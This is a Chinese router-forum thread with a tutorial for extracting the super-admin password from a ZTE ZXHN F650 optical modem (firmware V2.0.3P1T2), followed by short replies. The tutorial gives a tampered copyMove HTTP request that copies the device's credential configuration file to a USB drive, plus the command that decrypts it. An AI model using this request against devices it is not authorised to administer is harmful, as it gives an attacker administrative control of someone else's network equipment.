找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
广告投放联系QQ68610888广告投放联系QQ68610888
glinet
查看: 1070|回复: 10

[中兴] 关于中兴V2.0.3P1T2固件获取超管密码(首创),无需按rest键

[复制链接]
发表于 2025-4-3 11:51 | 显示全部楼层 |阅读模式

前言:


这个光猫研究我花了几个小时,熬夜到凌晨3点才弄好


方法应该是全网首发,废话不多说直接上教程






基本情况介绍:


光猫型号:ZXHN F650


固件版本:V2.0.3P1T2


需要准备:


1. U盘一个


2. 抓包软件
Reqable Reqable下载地址或者 Fiddler 4
我教程使用的是Reqable


操作步骤:


1. 插入U盘输入光猫后面的密码进入存储管理





2. 打开抓包软件,并配置好


在光猫点击文件夹,发现软件有数据在走则代表环境已经搭好

我的示例是在U盘的根目录下新建一个 Music 目录,后期db_user_cfg.xml会放到这个目录来


3.抓取/cgi-bin/luci/admin/storage/copyMove 数据包,并修改里面的路径


这一步尤为关键,总体思路是将/userconfig/cfg/db_user_cfg.xml 文件 复制到 u盘的 /Music 目录下(不是Music目录也可以,我这里是演示)


这个时候你随便在网关界面复制一个文件到某个目录







在抓包软件里面发现copyMove结尾的url包,修改提交的参数
  1. <font color="#000000">
  2. POST /cgi-bin/luci/admin/storage/copyMove HTTP/1.1
  3. Host: 192.168.1.1


  4. token=你的token&opstr=copy%7C%2Fuserconfig%2Fcfg%7C%2Fmnt%2FUSB_disc1%2FMusic%7Cdb_user_cfg.xml&fileLists=db_user_cfg.xml%2F&_=你的时间戳

  5. 改为

  6. copy%7C%2Fuserconfig%2Fcfg%7C%2Fmnt%2FUSB_disc1%2FMusic%2F1%2F%7Cdb_user_cfg.xml&fileLists=db_user_cfg.xml%2F&


  7. 看到响应就代表成功:
  8. {
  9.   "setRes": true,
  10.   "filePath": "/userconfig/cfg",
  11.   "percent": 100,
  12.   "transId": 3,
  13.   "fileNum": 0
  14. }

  15. 这个时候到U盘的/Music 目录下即可查看到db_user_cfg.xml文件</font>
复制代码






4.拿着这个db_user_cfg.xml文件去解密

解密工具下载地址: https://github.com/wx1183618058/ ... rk-Terminal-Decoder


下载解密软件执行命令

把这个db_user_cfg.xml和ztecfg.exe在同一个目录

cmd

ztecfg.exe -d AESCBC -i .\db_user_cfg.xml -o success.cfg

看见输出:
作者:欲断魂
介绍:仅支持中兴光猫3.0配置加解密
cfgFileDecryAESCBC magic=0x4030201 sign=0x4000000
cfgFileDecryCRC magic=0x1020304 size=0x66fec comp_size=0x7be7

这个时候打开success.cfg,搜索:Pass
即可看到超级管理员密码

DM name="User" val="telecomadmin"/>
<DM name="Pass" val="xxxx"/>




5.踩坑点:


千万不要去这个hidden_version_switch.gch页面切换版本,否则会直接恢复出厂设置,幸好我保存了db_user_cfg.xml文件,我搞到凌晨3点才恢复网络
http://192.168.1.1:8080/hidden_version_switch.gch




6.其他帮助


本帖子是根据教程:https://www.bilibili.com/opus/561816898105280335 的改版,如果在第三步有不懂的直接看这个教程,你就懂了




本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

×
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
发表于 2025-4-3 11:58 | 显示全部楼层
首创
支持分享
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2025-4-3 12:21 | 显示全部楼层
fttr可以弄吗 大佬

点评

没弄过噢,fttr没还接触过,勇敢的尝试一下吧  详情 回复 发表于 2025-4-3 14:12
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2025-4-3 14:12 | 显示全部楼层
seven99 发表于 2025-4-3 12:21
fttr可以弄吗 大佬

没弄过噢,fttr没还接触过,勇敢的尝试一下吧

点评

哈哈哈 那我支持一下  详情 回复 发表于 2025-4-3 16:14
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2025-4-3 16:13 | 显示全部楼层
老大用不来!还是支持下!
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2025-4-3 16:14 | 显示全部楼层
vae1314 发表于 2025-4-3 14:12
没弄过噢,fttr没还接触过,勇敢的尝试一下吧

哈哈哈 那我支持一下
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2025-4-3 16:14 | 显示全部楼层
可以抓光猫配置文件到U盘吗?

点评

YES,我这个直接抓包改数据,配置文件直接到U盘  详情 回复 发表于 2025-4-5 22:54
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2025-4-3 22:50 | 显示全部楼层
V2.3.0P1T11
大佬ZXHN F7005MV3 上面这个版本固件还有办法开Telnet吗

点评

这个可能要研究研究了,去网上找找相关的帖子  详情 回复 发表于 2025-4-5 22:54
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

发表于 2025-4-4 23:53 | 显示全部楼层
技术贴!研究支持
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2025-4-5 22:54 | 显示全部楼层
BIngo7 发表于 2025-4-3 22:50
V2.3.0P1T11
大佬ZXHN F7005MV3 上面这个版本固件还有办法开Telnet吗

这个可能要研究研究了,去网上找找相关的帖子
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

 楼主| 发表于 2025-4-5 22:54 | 显示全部楼层
jaha 发表于 2025-4-3 16:14
可以抓光猫配置文件到U盘吗?

YES,我这个直接抓包改数据,配置文件直接到U盘
只谈技术、莫论政事!(点击见详情) | 恩山无线论坛欢迎您的来访,请互相尊重、友善交流,建议保持一颗平常心看待网友的评论,切勿过度反应。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

欢迎大家光临恩山无线论坛上一条 /1 下一条

有疑问请添加管理员QQ86788181|手机版|小黑屋|Archiver|恩山无线论坛(常州市恩山计算机开发有限公司版权所有) ( 苏ICP备05084872号 )

GMT+8, 2025-5-20 20:18

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

| 江苏省互联网有害信息举报中心 举报信箱:js12377 | @jischina.com.cn 举报电话:025-88802724 本站不良内容举报信箱:68610888@qq.com

快速回复 返回顶部 返回列表